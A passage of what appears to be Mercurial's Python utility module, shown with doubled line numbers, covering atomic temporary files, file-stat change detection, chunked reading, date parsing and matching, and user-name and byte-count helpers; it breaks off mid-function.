1887 1887 return path.split(pycompat.ossep)
1888 1888
1889 1889 def gui():
1890 1890 '''Are we running in a GUI?'''
1891 1891 if pycompat.isdarwin:
1892 1892 if 'SSH_CONNECTION' in encoding.environ:
1893 1893 # handle SSH access to a box where the user is logged in
1894 1894 return False
1895 1895 elif getattr(osutil, 'isgui', None):
1896 1896 # check if a CoreGraphics session is available
1897 1897 return osutil.isgui()
1898 1898 else:
1899 1899 # pure build; use a safe default
1900 1900 return True
1901 1901 else:
1902 1902 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1903 1903
1904 1904 def mktempcopy(name, emptyok=False, createmode=None):
1905 1905 """Create a temporary file with the same contents from name
1906 1906
1907 1907 The permission bits are copied from the original file.
1908 1908
1909 1909 If the temporary file is going to be truncated immediately, you
1910 1910 can use emptyok=True as an optimization.
1911 1911
1912 1912 Returns the name of the temporary file.
1913 1913 """
1914 1914 d, fn = os.path.split(name)
1915 1915 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1916 1916 os.close(fd)
1917 1917 # Temporary files are created with mode 0600, which is usually not
1918 1918 # what we want. If the original file already exists, just copy
1919 1919 # its mode. Otherwise, manually obey umask.
1920 1920 copymode(name, temp, createmode)
1921 1921 if emptyok:
1922 1922 return temp
1923 1923 try:
1924 1924 try:
1925 1925 ifp = posixfile(name, "rb")
1926 1926 except IOError as inst:
1927 1927 if inst.errno == errno.ENOENT:
1928 1928 return temp
1929 1929 if not getattr(inst, 'filename', None):
1930 1930 inst.filename = name
1931 1931 raise
1932 1932 ofp = posixfile(temp, "wb")
1933 1933 for chunk in filechunkiter(ifp):
1934 1934 ofp.write(chunk)
1935 1935 ifp.close()
1936 1936 ofp.close()
1937 1937 except: # re-raises
1938 1938 try:
1939 1939 os.unlink(temp)
1940 1940 except OSError:
1941 1941 pass
1942 1942 raise
1943 1943 return temp
1944 1944
1945 1945 class filestat(object):
1946 1946 """help to exactly detect change of a file
1947 1947
1948 1948 'stat' attribute is result of 'os.stat()' if specified 'path'
1949 1949 exists. Otherwise, it is None. This can avoid preparative
1950 1950 'exists()' examination on client side of this class.
1951 1951 """
1952 1952 def __init__(self, stat):
1953 1953 self.stat = stat
1954 1954
1955 1955 @classmethod
1956 1956 def frompath(cls, path):
1957 1957 try:
1958 1958 stat = os.stat(path)
1959 1959 except OSError as err:
1960 1960 if err.errno != errno.ENOENT:
1961 1961 raise
1962 1962 stat = None
1963 1963 return cls(stat)
1964 1964
1965 1965 @classmethod
1966 1966 def fromfp(cls, fp):
1967 1967 stat = os.fstat(fp.fileno())
1968 1968 return cls(stat)
1969 1969
1970 1970 __hash__ = object.__hash__
1971 1971
1972 1972 def __eq__(self, old):
1973 1973 try:
1974 1974 # if ambiguity between stat of new and old file is
1975 1975 # avoided, comparison of size, ctime and mtime is enough
1976 1976 # to exactly detect change of a file regardless of platform
1977 1977 return (self.stat.st_size == old.stat.st_size and
1978 1978 self.stat.st_ctime == old.stat.st_ctime and
1979 1979 self.stat.st_mtime == old.stat.st_mtime)
1980 1980 except AttributeError:
1981 1981 pass
1982 1982 try:
1983 1983 return self.stat is None and old.stat is None
1984 1984 except AttributeError:
1985 1985 return False
1986 1986
1987 1987 def isambig(self, old):
1988 1988 """Examine whether new (= self) stat is ambiguous against old one
1989 1989
1990 1990 "S[N]" below means stat of a file at N-th change:
1991 1991
1992 1992 - S[n-1].ctime < S[n].ctime: can detect change of a file
1993 1993 - S[n-1].ctime == S[n].ctime
1994 1994 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1995 1995 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1996 1996 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1997 1997 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1998 1998
1999 1999 Case (*2) above means that a file was changed twice or more at
2000 2000 same time in sec (= S[n-1].ctime), and comparison of timestamp
2001 2001 is ambiguous.
2002 2002
2003 2003 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2004 2004 timestamp is ambiguous".
2005 2005
2006 2006 But advancing mtime only in case (*2) doesn't work as
2007 2007 expected, because naturally advanced S[n].mtime in case (*1)
2008 2008 might be equal to manually advanced S[n-1 or earlier].mtime.
2009 2009
2010 2010 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2011 2011 treated as ambiguous regardless of mtime, to avoid overlooking
2012 2012 by confliction between such mtime.
2013 2013
2014 2014 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2015 2015 S[n].mtime", even if size of a file isn't changed.
2016 2016 """
2017 2017 try:
2018 2018 return (self.stat.st_ctime == old.stat.st_ctime)
2019 2019 except AttributeError:
2020 2020 return False
2021 2021
2022 2022 def avoidambig(self, path, old):
2023 2023 """Change file stat of specified path to avoid ambiguity
2024 2024
2025 2025 'old' should be previous filestat of 'path'.
2026 2026
2027 2027 This skips avoiding ambiguity, if a process doesn't have
2028 2028 appropriate privileges for 'path'. This returns False in this
2029 2029 case.
2030 2030
2031 2031 Otherwise, this returns True, as "ambiguity is avoided".
2032 2032 """
2033 2033 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
2034 2034 try:
2035 2035 os.utime(path, (advanced, advanced))
2036 2036 except OSError as inst:
2037 2037 if inst.errno == errno.EPERM:
2038 2038 # utime() on the file created by another user causes EPERM,
2039 2039 # if a process doesn't have appropriate privileges
2040 2040 return False
2041 2041 raise
2042 2042 return True
2043 2043
2044 2044 def __ne__(self, other):
2045 2045 return not self == other
2046 2046
2047 2047 class atomictempfile(object):
2048 2048 '''writable file object that atomically updates a file
2049 2049
2050 2050 All writes will go to a temporary copy of the original file. Call
2051 2051 close() when you are done writing, and atomictempfile will rename
2052 2052 the temporary copy to the original name, making the changes
2053 2053 visible. If the object is destroyed without being closed, all your
2054 2054 writes are discarded.
2055 2055
2056 2056 checkambig argument of constructor is used with filestat, and is
2057 2057 useful only if target file is guarded by any lock (e.g. repo.lock
2058 2058 or repo.wlock).
2059 2059 '''
2060 2060 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2061 2061 self.__name = name # permanent name
2062 2062 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2063 2063 createmode=createmode)
2064 2064 self._fp = posixfile(self._tempname, mode)
2065 2065 self._checkambig = checkambig
2066 2066
2067 2067 # delegated methods
2068 2068 self.read = self._fp.read
2069 2069 self.write = self._fp.write
2070 2070 self.seek = self._fp.seek
2071 2071 self.tell = self._fp.tell
2072 2072 self.fileno = self._fp.fileno
2073 2073
2074 2074 def close(self):
2075 2075 if not self._fp.closed:
2076 2076 self._fp.close()
2077 2077 filename = localpath(self.__name)
2078 2078 oldstat = self._checkambig and filestat.frompath(filename)
2079 2079 if oldstat and oldstat.stat:
2080 2080 rename(self._tempname, filename)
2081 2081 newstat = filestat.frompath(filename)
2082 2082 if newstat.isambig(oldstat):
2083 2083 # stat of changed file is ambiguous to original one
2084 2084 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
2085 2085 os.utime(filename, (advanced, advanced))
2086 2086 else:
2087 2087 rename(self._tempname, filename)
2088 2088
2089 2089 def discard(self):
2090 2090 if not self._fp.closed:
2091 2091 try:
2092 2092 os.unlink(self._tempname)
2093 2093 except OSError:
2094 2094 pass
2095 2095 self._fp.close()
2096 2096
2097 2097 def __del__(self):
2098 2098 if safehasattr(self, '_fp'): # constructor actually did something
2099 2099 self.discard()
2100 2100
2101 2101 def __enter__(self):
2102 2102 return self
2103 2103
2104 2104 def __exit__(self, exctype, excvalue, traceback):
2105 2105 if exctype is not None:
2106 2106 self.discard()
2107 2107 else:
2108 2108 self.close()
2109 2109
2110 2110 def unlinkpath(f, ignoremissing=False):
2111 2111 """unlink and remove the directory if it is empty"""
2112 2112 if ignoremissing:
2113 2113 tryunlink(f)
2114 2114 else:
2115 2115 unlink(f)
2116 2116 # try removing directories that might now be empty
2117 2117 try:
2118 2118 removedirs(os.path.dirname(f))
2119 2119 except OSError:
2120 2120 pass
2121 2121
2122 2122 def tryunlink(f):
2123 2123 """Attempt to remove a file, ignoring ENOENT errors."""
2124 2124 try:
2125 2125 unlink(f)
2126 2126 except OSError as e:
2127 2127 if e.errno != errno.ENOENT:
2128 2128 raise
2129 2129
2130 2130 def makedirs(name, mode=None, notindexed=False):
2131 2131 """recursive directory creation with parent mode inheritance
2132 2132
2133 2133 Newly created directories are marked as "not to be indexed by
2134 2134 the content indexing service", if ``notindexed`` is specified
2135 2135 for "write" mode access.
2136 2136 """
2137 2137 try:
2138 2138 makedir(name, notindexed)
2139 2139 except OSError as err:
2140 2140 if err.errno == errno.EEXIST:
2141 2141 return
2142 2142 if err.errno != errno.ENOENT or not name:
2143 2143 raise
2144 2144 parent = os.path.dirname(os.path.abspath(name))
2145 2145 if parent == name:
2146 2146 raise
2147 2147 makedirs(parent, mode, notindexed)
2148 2148 try:
2149 2149 makedir(name, notindexed)
2150 2150 except OSError as err:
2151 2151 # Catch EEXIST to handle races
2152 2152 if err.errno == errno.EEXIST:
2153 2153 return
2154 2154 raise
2155 2155 if mode is not None:
2156 2156 os.chmod(name, mode)
2157 2157
2158 2158 def readfile(path):
2159 2159 with open(path, 'rb') as fp:
2160 2160 return fp.read()
2161 2161
2162 2162 def writefile(path, text):
2163 2163 with open(path, 'wb') as fp:
2164 2164 fp.write(text)
2165 2165
2166 2166 def appendfile(path, text):
2167 2167 with open(path, 'ab') as fp:
2168 2168 fp.write(text)
2169 2169
2170 2170 class chunkbuffer(object):
2171 2171 """Allow arbitrary sized chunks of data to be efficiently read from an
2172 2172 iterator over chunks of arbitrary size."""
2173 2173
2174 2174 def __init__(self, in_iter):
2175 2175 """in_iter is the iterator that's iterating over the input chunks."""
2176 2176 def splitbig(chunks):
2177 2177 for chunk in chunks:
2178 2178 if len(chunk) > 2**20:
2179 2179 pos = 0
2180 2180 while pos < len(chunk):
2181 2181 end = pos + 2 ** 18
2182 2182 yield chunk[pos:end]
2183 2183 pos = end
2184 2184 else:
2185 2185 yield chunk
2186 2186 self.iter = splitbig(in_iter)
2187 2187 self._queue = collections.deque()
2188 2188 self._chunkoffset = 0
2189 2189
2190 2190 def read(self, l=None):
2191 2191 """Read L bytes of data from the iterator of chunks of data.
2192 2192 Returns less than L bytes if the iterator runs dry.
2193 2193
2194 2194 If size parameter is omitted, read everything"""
2195 2195 if l is None:
2196 2196 return ''.join(self.iter)
2197 2197
2198 2198 left = l
2199 2199 buf = []
2200 2200 queue = self._queue
2201 2201 while left > 0:
2202 2202 # refill the queue
2203 2203 if not queue:
2204 2204 target = 2**18
2205 2205 for chunk in self.iter:
2206 2206 queue.append(chunk)
2207 2207 target -= len(chunk)
2208 2208 if target <= 0:
2209 2209 break
2210 2210 if not queue:
2211 2211 break
2212 2212
2213 2213 # The easy way to do this would be to queue.popleft(), modify the
2214 2214 # chunk (if necessary), then queue.appendleft(). However, for cases
2215 2215 # where we read partial chunk content, this incurs 2 dequeue
2216 2216 # mutations and creates a new str for the remaining chunk in the
2217 2217 # queue. Our code below avoids this overhead.
2218 2218
2219 2219 chunk = queue[0]
2220 2220 chunkl = len(chunk)
2221 2221 offset = self._chunkoffset
2222 2222
2223 2223 # Use full chunk.
2224 2224 if offset == 0 and left >= chunkl:
2225 2225 left -= chunkl
2226 2226 queue.popleft()
2227 2227 buf.append(chunk)
2228 2228 # self._chunkoffset remains at 0.
2229 2229 continue
2230 2230
2231 2231 chunkremaining = chunkl - offset
2232 2232
2233 2233 # Use all of unconsumed part of chunk.
2234 2234 if left >= chunkremaining:
2235 2235 left -= chunkremaining
2236 2236 queue.popleft()
2237 2237 # offset == 0 is enabled by block above, so this won't merely
2238 2238 # copy via ``chunk[0:]``.
2239 2239 buf.append(chunk[offset:])
2240 2240 self._chunkoffset = 0
2241 2241
2242 2242 # Partial chunk needed.
2243 2243 else:
2244 2244 buf.append(chunk[offset:offset + left])
2245 2245 self._chunkoffset += left
2246 2246 left -= chunkremaining
2247 2247
2248 2248 return ''.join(buf)
2249 2249
2250 2250 def filechunkiter(f, size=131072, limit=None):
2251 2251 """Create a generator that produces the data in the file size
2252 2252 (default 131072) bytes at a time, up to optional limit (default is
2253 2253 to read all data). Chunks may be less than size bytes if the
2254 2254 chunk is the last chunk in the file, or the file is a socket or
2255 2255 some other type of file that sometimes reads less data than is
2256 2256 requested."""
2257 2257 assert size >= 0
2258 2258 assert limit is None or limit >= 0
2259 2259 while True:
2260 2260 if limit is None:
2261 2261 nbytes = size
2262 2262 else:
2263 2263 nbytes = min(limit, size)
2264 2264 s = nbytes and f.read(nbytes)
2265 2265 if not s:
2266 2266 break
2267 2267 if limit:
2268 2268 limit -= len(s)
2269 2269 yield s
2270 2270
2271 2271 class cappedreader(object):
2272 2272 """A file object proxy that allows reading up to N bytes.
2273 2273
2274 2274 Given a source file object, instances of this type allow reading up to
2275 2275 N bytes from that source file object. Attempts to read past the allowed
2276 2276 limit are treated as EOF.
2277 2277
2278 2278 It is assumed that I/O is not performed on the original file object
2279 2279 in addition to I/O that is performed by this instance. If there is,
2280 2280 state tracking will get out of sync and unexpected results will ensue.
2281 2281 """
2282 2282 def __init__(self, fh, limit):
2283 2283 """Allow reading up to <limit> bytes from <fh>."""
2284 2284 self._fh = fh
2285 2285 self._left = limit
2286 2286
2287 2287 def read(self, n=-1):
2288 2288 if not self._left:
2289 2289 return b''
2290 2290
2291 2291 if n < 0:
2292 2292 n = self._left
2293 2293
2294 2294 data = self._fh.read(min(n, self._left))
2295 2295 self._left -= len(data)
2296 2296 assert self._left >= 0
2297 2297
2298 2298 return data
2299 2299
2300 2300 def makedate(timestamp=None):
2301 2301 '''Return a unix timestamp (or the current time) as a (unixtime,
2302 2302 offset) tuple based off the local timezone.'''
2303 2303 if timestamp is None:
2304 2304 timestamp = time.time()
2305 2305 if timestamp < 0:
2306 2306 hint = _("check your clock")
2307 2307 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
2308 2308 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
2309 2309 datetime.datetime.fromtimestamp(timestamp))
2310 2310 tz = delta.days * 86400 + delta.seconds
2311 2311 return timestamp, tz
2312 2312
2313 2313 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
2314 2314 """represent a (unixtime, offset) tuple as a localized time.
2315 2315 unixtime is seconds since the epoch, and offset is the time zone's
2316 2316 number of seconds away from UTC.
2317 2317
2318 2318 >>> datestr((0, 0))
2319 2319 'Thu Jan 01 00:00:00 1970 +0000'
2320 2320 >>> datestr((42, 0))
2321 2321 'Thu Jan 01 00:00:42 1970 +0000'
2322 2322 >>> datestr((-42, 0))
2323 2323 'Wed Dec 31 23:59:18 1969 +0000'
2324 2324 >>> datestr((0x7fffffff, 0))
2325 2325 'Tue Jan 19 03:14:07 2038 +0000'
2326 2326 >>> datestr((-0x80000000, 0))
2327 2327 'Fri Dec 13 20:45:52 1901 +0000'
2328 2328 """
2329 2329 t, tz = date or makedate()
2330 2330 if "%1" in format or "%2" in format or "%z" in format:
2331 2331 sign = (tz > 0) and "-" or "+"
2332 2332 minutes = abs(tz) // 60
2333 2333 q, r = divmod(minutes, 60)
2334 2334 format = format.replace("%z", "%1%2")
2335 2335 format = format.replace("%1", "%c%02d" % (sign, q))
2336 2336 format = format.replace("%2", "%02d" % r)
2337 2337 d = t - tz
2338 2338 if d > 0x7fffffff:
2339 2339 d = 0x7fffffff
2340 2340 elif d < -0x80000000:
2341 2341 d = -0x80000000
2342 2342 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2343 2343 # because they use the gmtime() system call which is buggy on Windows
2344 2344 # for negative values.
2345 2345 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2346 2346 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2347 2347 return s
2348 2348
2349 2349 def shortdate(date=None):
2350 2350 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2351 2351 return datestr(date, format='%Y-%m-%d')
2352 2352
2353 2353 def parsetimezone(s):
2354 2354 """find a trailing timezone, if any, in string, and return a
2355 2355 (offset, remainder) pair"""
2356 2356 s = pycompat.bytestr(s)
2357 2357
2358 2358 if s.endswith("GMT") or s.endswith("UTC"):
2359 2359 return 0, s[:-3].rstrip()
2360 2360
2361 2361 # Unix-style timezones [+-]hhmm
2362 2362 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2363 2363 sign = (s[-5] == "+") and 1 or -1
2364 2364 hours = int(s[-4:-2])
2365 2365 minutes = int(s[-2:])
2366 2366 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2367 2367
2368 2368 # ISO8601 trailing Z
2369 2369 if s.endswith("Z") and s[-2:-1].isdigit():
2370 2370 return 0, s[:-1]
2371 2371
2372 2372 # ISO8601-style [+-]hh:mm
2373 2373 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2374 2374 s[-5:-3].isdigit() and s[-2:].isdigit()):
2375 2375 sign = (s[-6] == "+") and 1 or -1
2376 2376 hours = int(s[-5:-3])
2377 2377 minutes = int(s[-2:])
2378 2378 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2379 2379
2380 2380 return None, s
2381 2381
2382 2382 def strdate(string, format, defaults=None):
2383 2383 """parse a localized time string and return a (unixtime, offset) tuple.
2384 2384 if the string cannot be parsed, ValueError is raised."""
2385 2385 if defaults is None:
2386 2386 defaults = {}
2387 2387
2388 2388 # NOTE: unixtime = localunixtime + offset
2389 2389 offset, date = parsetimezone(string)
2390 2390
2391 2391 # add missing elements from defaults
2392 2392 usenow = False # default to using biased defaults
2393 2393 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2394 2394 part = pycompat.bytestr(part)
2395 2395 found = [True for p in part if ("%"+p) in format]
2396 2396 if not found:
2397 2397 date += "@" + defaults[part][usenow]
2398 2398 format += "@%" + part[0]
2399 2399 else:
2400 2400 # We've found a specific time element, less specific time
2401 2401 # elements are relative to today
2402 2402 usenow = True
2403 2403
2404 2404 timetuple = time.strptime(encoding.strfromlocal(date),
2405 2405 encoding.strfromlocal(format))
2406 2406 localunixtime = int(calendar.timegm(timetuple))
2407 2407 if offset is None:
2408 2408 # local timezone
2409 2409 unixtime = int(time.mktime(timetuple))
2410 2410 offset = unixtime - localunixtime
2411 2411 else:
2412 2412 unixtime = localunixtime + offset
2413 2413 return unixtime, offset
2414 2414
2415 2415 def parsedate(date, formats=None, bias=None):
2416 2416 """parse a localized date/time and return a (unixtime, offset) tuple.
2417 2417
2418 2418 The date may be a "unixtime offset" string or in one of the specified
2419 2419 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2420 2420
2421 2421 >>> parsedate(b' today ') == parsedate(
2422 2422 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2423 2423 True
2424 2424 >>> parsedate(b'yesterday ') == parsedate(
2425 2425 ... (datetime.date.today() - datetime.timedelta(days=1)
2426 2426 ... ).strftime('%b %d').encode('ascii'))
2427 2427 True
2428 2428 >>> now, tz = makedate()
2429 2429 >>> strnow, strtz = parsedate(b'now')
2430 2430 >>> (strnow - now) < 1
2431 2431 True
2432 2432 >>> tz == strtz
2433 2433 True
2434 2434 """
2435 2435 if bias is None:
2436 2436 bias = {}
2437 2437 if not date:
2438 2438 return 0, 0
2439 2439 if isinstance(date, tuple) and len(date) == 2:
2440 2440 return date
2441 2441 if not formats:
2442 2442 formats = defaultdateformats
2443 2443 date = date.strip()
2444 2444
2445 2445 if date == 'now' or date == _('now'):
2446 2446 return makedate()
2447 2447 if date == 'today' or date == _('today'):
2448 2448 date = datetime.date.today().strftime(r'%b %d')
2449 2449 date = encoding.strtolocal(date)
2450 2450 elif date == 'yesterday' or date == _('yesterday'):
2451 2451 date = (datetime.date.today() -
2452 2452 datetime.timedelta(days=1)).strftime(r'%b %d')
2453 2453 date = encoding.strtolocal(date)
2454 2454
2455 2455 try:
2456 2456 when, offset = map(int, date.split(' '))
2457 2457 except ValueError:
2458 2458 # fill out defaults
2459 2459 now = makedate()
2460 2460 defaults = {}
2461 2461 for part in ("d", "mb", "yY", "HI", "M", "S"):
2462 2462 # this piece is for rounding the specific end of unknowns
2463 2463 b = bias.get(part)
2464 2464 if b is None:
2465 2465 if part[0:1] in "HMS":
2466 2466 b = "00"
2467 2467 else:
2468 2468 b = "0"
2469 2469
2470 2470 # this piece is for matching the generic end to today's date
2471 2471 n = datestr(now, "%" + part[0:1])
2472 2472
2473 2473 defaults[part] = (b, n)
2474 2474
2475 2475 for format in formats:
2476 2476 try:
2477 2477 when, offset = strdate(date, format, defaults)
2478 2478 except (ValueError, OverflowError):
2479 2479 pass
2480 2480 else:
2481 2481 break
2482 2482 else:
2483 2483 raise error.ParseError(
2484 2484 _('invalid date: %r') % pycompat.bytestr(date))
2485 2485 # validate explicit (probably user-specified) date and
2486 2486 # time zone offset. values must fit in signed 32 bits for
2487 2487 # current 32-bit linux runtimes. timezones go from UTC-12
2488 2488 # to UTC+14
2489 2489 if when < -0x80000000 or when > 0x7fffffff:
2490 2490 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2491 2491 if offset < -50400 or offset > 43200:
2492 2492 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2493 2493 return when, offset
2494 2494
2495 2495 def matchdate(date):
2496 2496 """Return a function that matches a given date match specifier
2497 2497
2498 2498 Formats include:
2499 2499
2500 2500 '{date}' match a given date to the accuracy provided
2501 2501
2502 2502 '<{date}' on or before a given date
2503 2503
2504 2504 '>{date}' on or after a given date
2505 2505
2506 2506 >>> p1 = parsedate(b"10:29:59")
2507 2507 >>> p2 = parsedate(b"10:30:00")
2508 2508 >>> p3 = parsedate(b"10:30:59")
2509 2509 >>> p4 = parsedate(b"10:31:00")
2510 2510 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2511 2511 >>> f = matchdate(b"10:30")
2512 2512 >>> f(p1[0])
2513 2513 False
2514 2514 >>> f(p2[0])
2515 2515 True
2516 2516 >>> f(p3[0])
2517 2517 True
2518 2518 >>> f(p4[0])
2519 2519 False
2520 2520 >>> f(p5[0])
2521 2521 False
2522 2522 """
2523 2523
2524 2524 def lower(date):
2525 2525 d = {'mb': "1", 'd': "1"}
2526 2526 return parsedate(date, extendeddateformats, d)[0]
2527 2527
2528 2528 def upper(date):
2529 2529 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2530 2530 for days in ("31", "30", "29"):
2531 2531 try:
2532 2532 d["d"] = days
2533 2533 return parsedate(date, extendeddateformats, d)[0]
2534 2534 except error.ParseError:
2535 2535 pass
2536 2536 d["d"] = "28"
2537 2537 return parsedate(date, extendeddateformats, d)[0]
2538 2538
2539 2539 date = date.strip()
2540 2540
2541 2541 if not date:
2542 2542 raise Abort(_("dates cannot consist entirely of whitespace"))
2543 2543 elif date[0] == "<":
2544 2544 if not date[1:]:
2545 2545 raise Abort(_("invalid day spec, use '<DATE'"))
2546 2546 when = upper(date[1:])
2547 2547 return lambda x: x <= when
2548 2548 elif date[0] == ">":
2549 2549 if not date[1:]:
2550 2550 raise Abort(_("invalid day spec, use '>DATE'"))
2551 2551 when = lower(date[1:])
2552 2552 return lambda x: x >= when
2553 2553 elif date[0] == "-":
2554 2554 try:
2555 2555 days = int(date[1:])
2556 2556 except ValueError:
2557 2557 raise Abort(_("invalid day spec: %s") % date[1:])
2558 2558 if days < 0:
2559 2559 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2560 2560 % date[1:])
2561 2561 when = makedate()[0] - days * 3600 * 24
2562 2562 return lambda x: x >= when
2563 2563 elif " to " in date:
2564 2564 a, b = date.split(" to ")
2565 2565 start, stop = lower(a), upper(b)
2566 2566 return lambda x: x >= start and x <= stop
2567 2567 else:
2568 2568 start, stop = lower(date), upper(date)
2569 2569 return lambda x: x >= start and x <= stop
2570 2570
2571 2571 def stringmatcher(pattern, casesensitive=True):
2572 2572 """
2573 2573 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2574 2574 returns the matcher name, pattern, and matcher function.
2575 2575 missing or unknown prefixes are treated as literal matches.
2576 2576
2577 2577 helper for tests:
2578 2578 >>> def test(pattern, *tests):
2579 2579 ... kind, pattern, matcher = stringmatcher(pattern)
2580 2580 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2581 2581 >>> def itest(pattern, *tests):
2582 2582 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2583 2583 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2584 2584
2585 2585 exact matching (no prefix):
2586 2586 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2587 2587 ('literal', 'abcdefg', [False, False, True])
2588 2588
2589 2589 regex matching ('re:' prefix)
2590 2590 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2591 2591 ('re', 'a.+b', [False, False, True])
2592 2592
2593 2593 force exact matches ('literal:' prefix)
2594 2594 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2595 2595 ('literal', 're:foobar', [False, True])
2596 2596
2597 2597 unknown prefixes are ignored and treated as literals
2598 2598 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2599 2599 ('literal', 'foo:bar', [False, False, True])
2600 2600
2601 2601 case insensitive regex matches
2602 2602 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2603 2603 ('re', 'A.+b', [False, False, True])
2604 2604
2605 2605 case insensitive literal matches
2606 2606 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2607 2607 ('literal', 'ABCDEFG', [False, False, True])
2608 2608 """
2609 2609 if pattern.startswith('re:'):
2610 2610 pattern = pattern[3:]
2611 2611 try:
2612 2612 flags = 0
2613 2613 if not casesensitive:
2614 2614 flags = remod.I
2615 2615 regex = remod.compile(pattern, flags)
2616 2616 except remod.error as e:
2617 2617 raise error.ParseError(_('invalid regular expression: %s')
2618 2618 % e)
2619 2619 return 're', pattern, regex.search
2620 2620 elif pattern.startswith('literal:'):
2621 2621 pattern = pattern[8:]
2622 2622
2623 2623 match = pattern.__eq__
2624 2624
2625 2625 if not casesensitive:
2626 2626 ipat = encoding.lower(pattern)
2627 2627 match = lambda s: ipat == encoding.lower(s)
2628 2628 return 'literal', pattern, match
2629 2629
2630 2630 def shortuser(user):
2631 2631 """Return a short representation of a user name or email address."""
2632 2632 f = user.find('@')
2633 2633 if f >= 0:
2634 2634 user = user[:f]
2635 2635 f = user.find('<')
2636 2636 if f >= 0:
2637 2637 user = user[f + 1:]
2638 2638 f = user.find(' ')
2639 2639 if f >= 0:
2640 2640 user = user[:f]
2641 2641 f = user.find('.')
2642 2642 if f >= 0:
2643 2643 user = user[:f]
2644 2644 return user
2645 2645
2646 2646 def emailuser(user):
2647 2647 """Return the user portion of an email address."""
2648 2648 f = user.find('@')
2649 2649 if f >= 0:
2650 2650 user = user[:f]
2651 2651 f = user.find('<')
2652 2652 if f >= 0:
2653 2653 user = user[f + 1:]
2654 2654 return user
2655 2655
2656 2656 def email(author):
2657 2657 '''get email of author.'''
2658 2658 r = author.find('>')
2659 2659 if r == -1:
2660 2660 r = None
2661 2661 return author[author.find('<') + 1:r]
2662 2662
2663 2663 def ellipsis(text, maxlength=400):
2664 2664 """Trim string to at most maxlength (default: 400) columns in display."""
2665 2665 return encoding.trim(text, maxlength, ellipsis='...')
2666 2666
2667 2667 def unitcountfn(*unittable):
2668 2668 '''return a function that renders a readable count of some quantity'''
2669 2669
2670 2670 def go(count):
2671 2671 for multiplier, divisor, format in unittable:
2672 2672 if abs(count) >= divisor * multiplier:
2673 2673 return format % (count / float(divisor))
2674 2674 return unittable[-1][2] % count
2675 2675
2676 2676 return go
2677 2677
2678 2678 def processlinerange(fromline, toline):
2679 2679 """Check that linerange <fromline>:<toline> makes sense and return a
2680 2680 0-based range.
2681 2681
2682 2682 >>> processlinerange(10, 20)
2683 2683 (9, 20)
2684 2684 >>> processlinerange(2, 1)
2685 2685 Traceback (most recent call last):
2686 2686 ...
2687 2687 ParseError: line range must be positive
2688 2688 >>> processlinerange(0, 5)
2689 2689 Traceback (most recent call last):
2690 2690 ...
2691 2691 ParseError: fromline must be strictly positive
2692 2692 """
2693 2693 if toline - fromline < 0:
2694 2694 raise error.ParseError(_("line range must be positive"))
2695 2695 if fromline < 1:
2696 2696 raise error.ParseError(_("fromline must be strictly positive"))
2697 2697 return fromline - 1, toline
2698 2698
2699 2699 bytecount = unitcountfn(
2700 2700 (100, 1 << 30, _('%.0f GB')),
2701 2701 (10, 1 << 30, _('%.1f GB')),
2702 2702 (1, 1 << 30, _('%.2f GB')),
2703 2703 (100, 1 << 20, _('%.0f MB')),
2704 2704 (10, 1 << 20, _('%.1f MB')),
2705 2705 (1, 1 << 20, _('%.2f MB')),
2706 2706 (100, 1 << 10, _('%.0f KB')),
2707 2707 (10, 1 << 10, _('%.1f KB')),
2708 2708 (1, 1 << 10, _('%.2f KB')),
2709 2709 (1, 1, _('%.0f bytes')),
2710 2710 )
2711 2711
2712 2712 # Matches a single EOL which can either be a CRLF where repeated CR
2713 2713 # are removed or a LF. We do not care about old Macintosh files, so a
2714 2714 # stray CR is an error.
2715 2715 _eolre = remod.compile(br'\r*\n')
2716 2716
2717 2717 def tolf(s):
2718 2718 return _eolre.sub('\n', s)
2719 2719
2720 2720 def tocrlf(s):
2721 2721 return _eolre.sub('\r\n', s)
2722 2722
2723 2723 if pycompat.oslinesep == '\r\n':
2724 2724 tonativeeol = tocrlf
2725 2725 fromnativeeol = tolf
2726 2726 else:
2727 2727 tonativeeol = pycompat.identity
2728 2728 fromnativeeol = pycompat.identity
2729 2729
2730 2730 def escapestr(s):
2731 2731 # call underlying function of s.encode('string_escape') directly for
